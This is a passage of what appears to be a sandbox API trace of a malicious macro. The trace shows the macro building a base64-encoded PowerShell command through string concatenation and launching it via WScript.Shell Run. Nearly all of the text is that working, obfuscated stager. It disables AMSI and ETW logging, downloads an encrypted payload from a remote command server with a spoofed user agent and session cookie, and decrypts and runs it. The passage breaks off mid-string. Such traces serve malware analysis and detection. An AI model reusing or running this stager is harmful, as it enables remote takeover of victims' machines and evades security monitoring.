pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.843] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAQQB5AFIAQwBvAGoAcABzAGgAbwBXAGsAdQB5AD0ASwA2ADUAYgBYAEMARgBGAHMAKwBHAGgANwBXAHcAYwBmAGYAcQBDAGsAbwBQAE0AcAAxAGMAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaA", bstrRight="BdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAk", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.843] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAQQB5AFIAQwBvAGoAcABzAGgAbwBXAGsAdQB5AD0ASwA2ADUAYgBYAEMARgBGAHMAKwBHAGgANwBXAHcAYwBmAGYAcQBDAGsAbwBQAE0AcAAxAGMAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAk", bstrRight="AFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AE", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.843] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAQQB5AFIAQwBvAGoAcABzAGgAbwBXAGsAdQB5AD0ASwA2ADUAYgBYAEMARgBGAHMAKwBHAGgANwBXAHcAYwBmAGYAcQBDAGsAbwBQAE0AcAAxAGMAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AE", bstrRight="kARQBYAA==", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.847] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x5fff365b38 | out: lpclsid=0x5fff365b38*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0175.854] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0175.854] CoCreateInstance (in: rclsid=0x5fff365b38*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x7fffd85caa48*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fff365ae8 | out: ppv=0x5fff365ae8*=0x1fe12be9b58) returned 0x0 [0175.912] WshShell:IUnknown:QueryInterface (in: This=0x1fe12be9b58, riid=0x7fffd85e4590*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x5fff365b00 | out: ppvObject=0x5fff365b00*=0x0) returned 0x80004002 [0175.913] WshShell:IUnknown:QueryInterface (in: This=0x1fe12be9b58, riid=0x7fffd85e45a0*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x5fff365b08 | out: ppvObject=0x5fff365b08*=0x0) returned 0x80004002 [0175.913] WshShell:IUnknown:QueryInterface (in: This=0x1fe12be9b58, riid=0x7fffd85caa68*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fff365bc8 | out: ppvObject=0x5fff365bc8*=0x1fe12be9b30) returned 0x0 [0175.913] WshShell:IUnknown:Release (This=0x1fe12be9b58) returned 0x1 [0175.915] WshShell:IDispatch:GetIDsOfNames (in: This=0x1fe12be9b30, riid=0x7fffd85caa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x5fff365cd0*="Run", cNames=0x1, lcid=0x1fe00000409, rgDispId=0x5fff365cb4 | out: rgDispId=0x5fff365cb4*=1000) returned 0x0 [0175.921] WshShell:IDispatch:Invoke (in: This=0x1fe12be9b30, dispIdMember=1000, riid=0x7fffd85caa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x5fff365c68*(rgvarg=([0]=0x1fe18ebc3f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARA